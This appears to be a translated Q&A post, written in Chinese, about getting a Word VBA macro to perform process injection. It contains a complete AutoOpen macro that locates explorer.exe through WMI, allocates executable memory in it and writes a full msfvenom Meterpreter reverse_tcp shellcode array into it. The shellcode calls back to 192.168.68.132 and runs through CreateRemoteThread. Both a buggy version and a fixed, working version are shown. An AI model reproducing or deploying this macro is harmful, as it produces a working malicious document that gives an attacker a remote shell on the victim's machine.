我的任务是创建一个在 Word 宏中执行进程注入的宏。这些步骤非常简单,可以复制来执行我用 C 编写的 shellcode。但是,我似乎很难在 VBA 上执行相同的技术。
我已在 VBA 代码顶部声明导入
OpenProcessVirtualAllocExWriteProcessMemoryCreateRemoteThreadGetLastErrorDeclare PtrSafe Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As LongPtr
Declare PtrSafe Function VirtualAllocEx Lib "Kernel32.dll" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Declare PtrSafe Function WriteProcessMemory Lib "Kernel32.dll" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByRef lpBuffer As Any, ByVal nSize As LongPtr, ByRef lpNumberOfBytesWritten As LongPtr) As LongPtr
Declare PtrSafe Function CreateRemoteThread Lib "Kernel32.dll" (ByVal hProcess As LongPtr, ByRef lpThreadAttributes As Any, ByVal dwStackSize As LongPtr, ByVal lpStartAddress As LongPtr, ByVal lpParameter As LongPtr, ByVal dwCreationFlags As Long, ByRef lpThreadId As LongPtr) As LongPtr
Declare PtrSafe Function GetLastError Lib "Kernel32.dll" () As Long
我还定义了一个子例程 AutoOpen,并在其中定义和声明了我的变量和函数调用。
Dim buf As Variant
' msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.68.132 LPORT=80 -f vba
buf = Array(252, 72, 131, 228, 240, 232, 204, 0, 0, 0, 65, 81, 65, 80, 82, 72, 49, 210, 81, 86, 101, 72, 139, 82, 96, 72, 139, 82, 24, 72, 139, 82, 32, 72, 15, 183, 74, 74, 72, 139, 114, 80, 77, 49, 201, 72, 49, 192, 172, 60, 97, 124, 2, 44, 32, 65, 193, 201, 13, 65, 1, 193, 226, 237, 82, 65, 81, 72, 139, 82, 32, 139, 66, 60, 72, 1, 208, 102, 129, 120, 24, _
11, 2, 15, 133, 114, 0, 0, 0, 139, 128, 136, 0, 0, 0, 72, 133, 192, 116, 103, 72, 1, 208, 68, 139, 64, 32, 139, 72, 24, 73, 1, 208, 80, 227, 86, 77, 49, 201, 72, 255, 201, 65, 139, 52, 136, 72, 1, 214, 72, 49, 192, 65, 193, 201, 13, 172, 65, 1, 193, 56, 224, 117, 241, 76, 3, 76, 36, 8, 69, 57, 209, 117, 216, 88, 68, 139, 64, 36, 73, 1, _
208, 102, 65, 139, 12, 72, 68, 139, 64, 28, 73, 1, 208, 65, 139, 4, 136, 65, 88, 65, 88, 72, 1, 208, 94, 89, 90, 65, 88, 65, 89, 65, 90, 72, 131, 236, 32, 65, 82, 255, 224, 88, 65, 89, 90, 72, 139, 18, 233, 75, 255, 255, 255, 93, 73, 190, 119, 115, 50, 95, 51, 50, 0, 0, 65, 86, 73, 137, 230, 72, 129, 236, 160, 1, 0, 0, 73, 137, 229, 73, _
188, 2, 0, 0, 80, 192, 168, 68, 132, 65, 84, 73, 137, 228, 76, 137, 241, 65, 186, 76, 119, 38, 7, 255, 213, 76, 137, 234, 104, 1, 1, 0, 0, 89, 65, 186, 41, 128, 107, 0, 255, 213, 106, 10, 65, 94, 80, 80, 77, 49, 201, 77, 49, 192, 72, 255, 192, 72, 137, 194, 72, 255, 192, 72, 137, 193, 65, 186, 234, 15, 223, 224, 255, 213, 72, 137, 199, 106, 16, 65, _
88, 76, 137, 226, 72, 137, 249, 65, 186, 153, 165, 116, 97, 255, 213, 133, 192, 116, 10, 73, 255, 206, 117, 229, 232, 147, 0, 0, 0, 72, 131, 236, 16, 72, 137, 226, 77, 49, 201, 106, 4, 65, 88, 72, 137, 249, 65, 186, 2, 217, 200, 95, 255, 213, 131, 248, 0, 126, 85, 72, 131, 196, 32, 94, 137, 246, 106, 64, 65, 89, 104, 0, 16, 0, 0, 65, 88, 72, 137, 242, _
72, 49, 201, 65, 186, 88, 164, 83, 229, 255, 213, 72, 137, 195, 73, 137, 199, 77, 49, 201, 73, 137, 240, 72, 137, 218, 72, 137, 249, 65, 186, 2, 217, 200, 95, 255, 213, 131, 248, 0, 125, 40, 88, 65, 87, 89, 104, 0, 64, 0, 0, 65, 88, 106, 0, 90, 65, 186, 11, 47, 15, 48, 255, 213, 87, 89, 65, 186, 117, 110, 77, 97, 255, 213, 73, 255, 206, 233, 60, 255, _
255, 255, 72, 1, 195, 72, 41, 198, 72, 133, 246, 117, 180, 65, 255, 231, 88, 106, 0, 89, 73, 199, 194, 240, 181, 162, 86, 255, 213)
Dim hProcess As LongPtr
Dim lpAddress As LongPtr
Dim bytesWritten As LongPtr
Dim wMem As LongPtr
Dim rThread As LongPtr
Dim lpThreadId As LongPtr
' Open explorer.exe process with PROCESS_ALL_ACCESS rights
hProcess = OpenProcess(&H1F0FFF, 0, 2192)
Debug.Print "OpenProcess: "; GetLastError
' Allocate memory block for storing shellcode
lpAddress = VirtualAllocEx(hProcess, 0, UBound(buf) - LBound(buf) + 2, &H3000, &H40)
Debug.Print "VirtualAllocEx: "; GetLastError
' Write entire buffer array into newly allocated memory block
wMem = WriteProcessMemory(hProcess, lpAddress, buf, UBound(buf) - LBound(buf) + 1, bytesWritten)
Debug.Print "Status: "; wMem; "Bytes Written: "; bytesWritten
Debug.Print "WriteProcessMemory: "; GetLastError
' TEST: Writing single byte of shellcode to memory block one at a time. Get 998 error code
'Dim counter As Long
'Dim data As Long
'For offset = LBound(buf) To UBound(buf)
' data = buf(offset)
' wMem = WriteProcessMemory(hProcess, lpAddress + offset, data, 1, bytesWritten)
' Debug.Print "Byte: "; data; " Status: "; wMem; " Bytes Written: "; bytesWritten
'Next offset
' Create remote thread for shellcode execution
rThread = CreateRemoteThread(hProcess, 0, 0, lpAddress, 0, 0, lpThreadId)
Debug.Print "CreateRemoteThread: "; GetLastError
Debug.Print "Thread ID: "; lpThreadId
运行宏后打印调试输出时,我在调试控制台中看到以下内容:
OpenProcess: 0
VirtualAllocEx: 0
Status: 1 Bytes Written: 510
WriteProcessMemory: 0
CreateRemoteThread: 0
Thread ID: 8692
一切似乎都还好。然而,当它执行并执行进程注入时,
explorer.exe我真的不知道这里发生了什么。我昨晚设法让它工作,但由于 Word 崩溃而丢失了所有代码......
这可能是我声明 Win32 函数导入的方式吗?这是我错误传递的变量吗?
我设法让它发挥作用。我没有使用
WriteProcessMemoryVirtualAllocEx因此,不要像这样写入整个缓冲区数组:
' Write entire buffer array into newly allocated memory block
wMem = WriteProcessMemory(hProcess, lpAddress, buf, UBound(buf) - LBound(buf) + 1, bytesWritten)
Debug.Print "Status: "; wMem; "Bytes Written: "; bytesWritten
Debug.Print "WriteProcessMemory: "; GetLastError
我是这样写的:
Dim counter As Long
Dim data As Long
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
wMem = WriteProcessMemory(hProcess, lpAddress + counter, data, 1, 0)
Next counter
此外,我对计算数组大小的方式做了一些更改。相反,我用
UBound(buf) - LBound(buf) + 2UBound(buf) + 1动态查找
explorer.exeDeclare PtrSafe Function OpenProcess Lib "Kernel32.dll" ( _
ByVal dwDesiredAccess As Long, _
ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long _
) As LongPtr
Declare PtrSafe Function VirtualAllocEx Lib "Kernel32.dll" ( _
ByVal hProcess As LongPtr, _
ByVal lpAddress As LongPtr, _
ByVal dwSize As LongPtr, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long _
) As LongPtr
Declare PtrSafe Function WriteProcessMemory Lib "Kernel32.dll" ( _
ByVal hProcess As LongPtr, _
ByVal lpBaseAddress As LongPtr, _
ByRef lpBuffer As Any, _
ByVal nSize As LongPtr, _
ByRef lpNumberOfBytesWritten As LongPtr _
) As LongPtr
Declare PtrSafe Function CreateRemoteThread Lib "Kernel32.dll" ( _
ByVal hProcess As LongPtr, _
ByRef lpThreadAttributes As Any, _
ByVal dwStackSize As LongPtr, _
ByVal lpStartAddress As LongPtr, _
ByVal lpParameter As LongPtr, _
ByVal dwCreationFlags As Long, _
ByRef lpThreadId As LongPtr _
) As LongPtr
Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
ByVal hObject As LongPtr _
) As Long
Sub AutoOpen()
' Get explorer.exe process PID dynamically with WMI
Dim pid As Long
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2")
Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_Process", , 48)
For Each objItem In colItems
If objItem.Name = "explorer.exe" Then
pid = objItem.processId
Exit For
End If
Next
Dim buf As Variant
' msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.68.132 LPORT=1337 -f vba
buf = Array(252, 72, 131, 228, 240, 232, 204, 0, 0, 0, 65, 81, 65, 80, 82, 72, 49, 210, 101, 72, 139, 82, 96, 81, 72, 139, 82, 24, 86, 72, 139, 82, 32, 72, 15, 183, 74, 74, 77, 49, 201, 72, 139, 114, 80, 72, 49, 192, 172, 60, 97, 124, 2, 44, 32, 65, 193, 201, 13, 65, 1, 193, 226, 237, 82, 65, 81, 72, 139, 82, 32, 139, 66, 60, 72, 1, 208, 102, 129, 120, 24, _
11, 2, 15, 133, 114, 0, 0, 0, 139, 128, 136, 0, 0, 0, 72, 133, 192, 116, 103, 72, 1, 208, 68, 139, 64, 32, 80, 73, 1, 208, 139, 72, 24, 227, 86, 72, 255, 201, 77, 49, 201, 65, 139, 52, 136, 72, 1, 214, 72, 49, 192, 65, 193, 201, 13, 172, 65, 1, 193, 56, 224, 117, 241, 76, 3, 76, 36, 8, 69, 57, 209, 117, 216, 88, 68, 139, 64, 36, 73, 1, _
208, 102, 65, 139, 12, 72, 68, 139, 64, 28, 73, 1, 208, 65, 139, 4, 136, 72, 1, 208, 65, 88, 65, 88, 94, 89, 90, 65, 88, 65, 89, 65, 90, 72, 131, 236, 32, 65, 82, 255, 224, 88, 65, 89, 90, 72, 139, 18, 233, 75, 255, 255, 255, 93, 73, 190, 119, 115, 50, 95, 51, 50, 0, 0, 65, 86, 73, 137, 230, 72, 129, 236, 160, 1, 0, 0, 73, 137, 229, 73, _
188, 2, 0, 5, 57, 192, 168, 68, 132, 65, 84, 73, 137, 228, 76, 137, 241, 65, 186, 76, 119, 38, 7, 255, 213, 76, 137, 234, 104, 1, 1, 0, 0, 89, 65, 186, 41, 128, 107, 0, 255, 213, 106, 10, 65, 94, 80, 80, 77, 49, 201, 77, 49, 192, 72, 255, 192, 72, 137, 194, 72, 255, 192, 72, 137, 193, 65, 186, 234, 15, 223, 224, 255, 213, 72, 137, 199, 106, 16, 65, _
88, 76, 137, 226, 72, 137, 249, 65, 186, 153, 165, 116, 97, 255, 213, 133, 192, 116, 10, 73, 255, 206, 117, 229, 232, 147, 0, 0, 0, 72, 131, 236, 16, 72, 137, 226, 77, 49, 201, 106, 4, 65, 88, 72, 137, 249, 65, 186, 2, 217, 200, 95, 255, 213, 131, 248, 0, 126, 85, 72, 131, 196, 32, 94, 137, 246, 106, 64, 65, 89, 104, 0, 16, 0, 0, 65, 88, 72, 137, 242, _
72, 49, 201, 65, 186, 88, 164, 83, 229, 255, 213, 72, 137, 195, 73, 137, 199, 77, 49, 201, 73, 137, 240, 72, 137, 218, 72, 137, 249, 65, 186, 2, 217, 200, 95, 255, 213, 131, 248, 0, 125, 40, 88, 65, 87, 89, 104, 0, 64, 0, 0, 65, 88, 106, 0, 90, 65, 186, 11, 47, 15, 48, 255, 213, 87, 89, 65, 186, 117, 110, 77, 97, 255, 213, 73, 255, 206, 233, 60, 255, _
255, 255, 72, 1, 195, 72, 41, 198, 72, 133, 246, 117, 180, 65, 255, 231, 88, 106, 0, 89, 73, 199, 194, 240, 181, 162, 86, 255, 213)
' Open explorer.exe process with PROCESS_ALL_ACCESS rights
Dim hProcess As LongPtr
hProcess = OpenProcess(&H1F0FFF, 0, pid)
' Allocate memory block for storing shellcode
Dim lpAddress As LongPtr
lpAddress = VirtualAllocEx(hProcess, 0, UBound(buf) + 1, &H3000, &H40)
' Write shellcode into newly allocated memory block one byte at a time
Dim wMem As LongPtr
Dim counter As Long
Dim data As Long
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
wMem = WriteProcessMemory(hProcess, lpAddress + counter, data, 1, 0)
Next counter
'Create remote thread for shellcode execution
Dim rThread As LongPtr
rThread = CreateRemoteThread(hProcess, 0, 0, lpAddress, 0, 0, 0)
' Close explorer.exe handle opened by OpenProcess
CloseHandle (hProcess)
End Sub